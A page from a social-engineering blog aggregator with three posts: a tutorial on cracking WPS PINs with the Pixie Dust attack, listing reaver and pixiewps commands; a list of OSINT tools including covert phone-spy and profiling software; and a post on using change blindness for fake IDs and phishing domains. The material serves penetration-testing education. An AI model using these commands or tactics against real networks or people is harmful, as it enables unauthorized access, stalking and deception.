Social Engineering Blogs

An Aggregator for Blogs About Social Engineering and Related Fields

Subliminal Hacking Blog September 21, 2015

How To Crack WPS with Pixie Dust … Offline Attacking

In this post we are looking at how vulnerable WPS makes your Access Point. WiFi Protected Setup makes it nice and easy for you to connect to your wireless devices by using a simple pin number, instead of your hard to guess passphrase. The issue is that this means your secure 32 character passphrase is about as much use a chocolate fireguard, as instead of taking potentially years to crack, you can attack the pin number which only has 11,000 iterations and this can be cracked in hours (even with timeouts and other controls in place).

In this video we will show how a vulnerability in some of the chipsets of Wireless Access Points allows you to crack the WPS code in less than a second as well as revealing the WPA pin number. This attack is called the PixieDust attack, and it currently works on certain firmware on Broadcom, Realtek, Ralink and MediaTek chipsets. In the video this is demonstrated on an older BT HomeHub 3 which is using a Realtek chipset.

The way this works is that the Enrollee Hashes (E-Hash1 / E-Hash2) are supposed to be secret hashes, but when they are disclosed we can use them along with the Enrolle and Registrar Public Keys, along with the E & R Nonces and the Auth Key to decipher the WPS PIN Key.

Just to provide some comparison, using the WPS PixieDust attack we got the PIN and then the WPA2 Passphrase in less than a second. Stealing the WPA2 Hash and attacking this directly with a single GPU the time estimated to crack based on knowing its Alpha Numeric with no special characters is 853,399 days, 2 hours and 44 minutes, so year WPS add some weakness to your hardened access point :)

Below is the code used during the above video, you can use this easily copy and paste with your own information.

iwconfig

airmon-ng start wlan1

airmon-ng check kill

airodump-ng wlan1mon –wps

reaver -i wlan1mon -c -b -vv

pixiewps -e -r -s -z -a -n

reaver -i wlan1mon -c -b -vv -K 1

If you are looking to do this on Ubuntu and not Kali, you will need the following packages (cheers Matt):

apt-get install install build-essential libnl-3-dev libnl-genl-3-dev

wget http://download.aircrack-ng.org/aircrack-ng.1.2-rc2.tar.gz

git clone https://github.com/t6x/reaver-wps-fork-t6x

git clone https://github.com/wiire/pixiewps

Finally, in the WPS column you need to be checking for one of the following to make sure the Access Point has WPS enabled, if it isnt its not supported on the device, or you have successfully disabled it. 1.0, LAB, PBC, NFC, PIN,

Filed Under: Hacking, Tools

Subliminal Hacking Blog December 27, 2012

OSINT Tools … Recommendations List

Free OSINT Tools.

With the New Year fast approaching I thought now would be a great time to post the first draft of some recommended Open Source Intelligence (OSINT) gathering tools and resources. I will look to maintain this list overtime and have it grow, so if you come across something you think should be on the list, drop me an email or leave a comment for consideration.

The reconnaissance phase of any engagement is very important and can often save you alot of time and of course money. If you are really lucky you may even find the information you are looking for freely available posted online. Either way the information you find will only be as good as the tools you use, so with this in mind here is the list based on tools I have come across over the years or have been recommended by other InfoSec peeps.

* Please note even though the aim is to provide information for free OSINT Tools, some may require a subscription or commercial fee.

Spokeo – People search engine and free white pages finds phone, address, email, and photos. Find people by name, email, address, and phone for free.
theHarvester – This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.
Foca – FOCA 3.2 Free is a fingerprinrint and information gathering tool for pentesters. It searchs for servers, domains, URLS and public documents and print out discoverd information in a network tree. It also searches for data leaks such as metadata, directory listing, unsecure HTTP methods, .listing or .DS_Store files, actived cache in DNS Serves, etc…
Shodan – Search for computers based on software, geography, operating system, IP address and more
Maltego – Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates. Maltego’s unique advantage is to demonstrate the complexity and severity of single points of failure as well as trust relationships that exist currently within the scope of your infrastructure.
Deep Magic – Search for DNS records and other fun stuff
Jigsaw – Jigsaw is a prospecting tool used by sales professionals, marketers and recruiters to get fresh and accurate sales leads and business contact information.
Hoovers – Search over 85 million companies within 900 industry segments; Hoover’s Reports Easy-to-read reports on key competitors, financials, and executives
Market Visual – Search Professionals by Name, Company or Title
FoxOne Scanner – Non- Invasive and Non-Detectable WebServer Reconnaissance Scanner
Creepy – creepy is an application that allows you to gather geolocation related information about users from social networking platforms and image hosting services.
Recorded Future – Recorded Future intelligence analysis tools help analysts understand trends in big data, and foresee what may happen in the future. Groundbreaking algorithms extract temporal and predictive signals from unstructured text. Recorded Future organizes this information, delineates results over interactive timelines, visualizes past trends, and maps future events– all while providing traceability back to sources. From OSINT to classified data, Recorded Future offers innovative, massively scalable solutions.
MobiStealth – Mobistealth Cell Phone Spy Software empowers you to get the answers you truly want and deserve. Including a host of advanced surveillance features, our Cell Phone Spy Software secretly monitors all cell phone activities and sends the information back to your Mobistealth user account.
Snoopy – Snoopy is a distributed tracking and profiling framework
Stalker – STALKER is a tool to reconstruct all captured traffic (wired or wireless alike) and parse out all of the “interesting” information disclosures.  It goes beyond just grabbing passwords and emails out of the air as it attempts to build a complete profile of your target(s).  You would be amazed at how much data you can collect in 15 minutes.
LinkedIn Maps – Your professional world. Visualized. Map your professional network to understand the relationships between you and your connections
LittleSis – LittleSis is a free database of who-knows-who at the heights of business and government.
Entity Cube – EntityCube is a research prototype for exploring object-level search technologies, which automatically summarizes the Web for entities (such as people, locations and organizations) with a modest web presence.
TinEye – TinEye is a reverse image search engine built by Idée currently in beta. Give it an image and it will tell you where the image appears on the web.
Google Hacking DB – Google Search Query Fu to find the secret sauce
ServerSniff – ServerSniff.net – Your free “Swiss Army Knife” for networking, serverchecks and routing with many many little toys and tools for administrators, webmasters, developers, powerusers und security-aware users.
MyIPNeighbours – My IP Neighbors lets you find out if any other web sites (“virtual hosts”) are hosted on a given web server.
Social Mention – Social Mention is a social media search engine that searches user-generated content such as blogs, comments, bookmarks, events, news, videos, and more
Glass Door – Search jobs then look inside. Company salaries, reviews, interview questions, and more – all posted anonymously by employees and job seekers.
NameCHK – Check to see if your desired username or vanity url is still available at dozens of popular Social Networking and Social Bookmarking websites.
Scythe – The ability to test a range of email addresses (or account names) across a range of websites (e.g. social media, blogging platforms, etc…) to find where those “targets” have active accounts.
Recon-NG – A nice Python Script that automates recon on LinkedIn, Jigsaw, Shodan and some search engine fu.
Pushpin – Awesome little Python script that will identify every tweet, flicker pic and Youtube video within an area of a specific Geo address.
Silobreaker – Enterprise Semantic Search Engine, allows virtualisation of data, analytics and exploration of key data.
Google Trends – See what are the popular related topics people are searching for. This will help widen your search scope.
Google Alerts – Google Alerts are email updates of the latest relevant Google results (web, news, etc.) based on your queries.
Addict-o-matic – Nice little search aggregator. Allows you to enter a search term and build a page from search and social networking sites.
PasteLert – PasteLert is a simple system to search pastebin.com and set up alerts (like google alerts) for pastebin.com entries. This means you will automatically recieve email whenever your term(s) is/are found in new pastebin entries!
Kurrently – Real Time Search Engine for Social Media.
CheckUsernames – Check for usernames across 160 Social Networking Sites.
Whos Talkin – social media search tool that allows users to search for conversations surrounding the topics that they care about most.
192 – Search for People, Businesses and Places in the UK.
Esearchy – Esearchy is a small library capable of searching the internet for email addresses. It can also search for emails within supported documents.
TouchGraph SEO – Java based tool for importing and visualising various data types.

Its not listed above, but of course popular Social Networks such as Facebook, Twitter, LinkedIn and alike have a wealth of information. Of course also consider older sources that are now less popular, its amazing what people leave behind on stuff like MySpace. Also remember that search engines show you stuff thats popular, not perhaps the obscure stuff you are searching for, so get creative with your search queries and use the various tools at your disposal.

Lastly I will add alot of Social Engineers dont have alot of global exposure, so do your homework of where you are targeting. If you are targeting Japan for example their number 1 Social Network is not Facebook, so you need to do recon in the right places, and put in the extra legwork to gain the relevant access.

Filed Under: Hacking, infosec

Subliminal Hacking Blog November 16, 2012

Now you see it, now you dont … Change Blindness

Change blindness is an interesting natural phenomena every human experiences on a pretty regular basis, but what is it exactly? Essentially its our inability to spot obvious changes that occur around us. There has been a fair bit of study done to understand this better, while I wont claim to have all the answers I do know that this research has shown that surprisingly we are not so good at spotting changes in colour, but are better at spotting when something is added or removed from a scene. I imagine carrying out these studies are pretty difficult as by there nature the participants are being tested and are under controlled additions, which is interesting as change blindness is most common when we are not looking for changes, when our mind isn’t focused and attentive to the finer details. This is an interesting area of study and one that I believe will continue for a while, as there can be legal complications when it comes to testimonies where images are concerned, I personally think some of this comes back to what we have discussed before, the human mind is processing so much information so quickly, it wants to help out and define an easy answer, so doesn’t pay attention to what it may consider minor details at that moment. I recommend if you find this sort of thing interesting do some further research on change blindness and what your mind really knows about what is occurring at this instance.

So why is change blindness of any interest to you from a social engineering perspective? Well I fell there are a few reasons. The first one, and the one most difficult to possibly get your head around is that attention to detail really isn’t that important sometimes. What do I mean? Well Harvard did some interesting research (Derren Brown example below) called “The Person Swap” where they had people approach a desk where a gentleman would have them sign a form, he would then duck down to file the form and another man would pop up, and a large percentage didn’t notice any change. When you think of a change this significant it puts a few things in perspective, the key thing here is that people were not looking for / expecting change. So if you are prepping for an onsite engagement, ask yourself will my ID need to stand up to direct scrutiny, or will just having something similar do the job?

The same applies in things such as phishing campaigns, its may seem obvious as many people already know that when we read something the letters of a word can be jumbled but it still makes sense to us. The same applied to domain names and other key pieces of information, so perhaps substitution isn’t always required, simply omitting it could still be successful as it wouldn’t be expected for it not to be right.

This is just a brief glimpse as what change blindness means to us, in reality it should tell us that alot of what we do / dont see is an illusions. If you think it wouldn’t happen to you, or you spotted thing again. Sure you will spot the issues where you are suspicious and are looking, but these not something many of us do for everything, unless we are very paranoid. Then we imagine things that are not there at all :D

Another good change blindness test :)

Filed Under: Influence, Misdirection, Social Engineering

  • « Previous Page
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • …
  • 10
  • Next Page »

About

Welcome to an aggregator for blogs about social engineering and related fields. Feel free to take a look around, and make sure to visit the original sites.

If you would like to suggest a site or contact us, use the links below.

Contact

  • Contact
  • Suggest a Site
  • Remove a Site

© Copyright 2025 Social Engineering Blogs · All Rights Reserved ·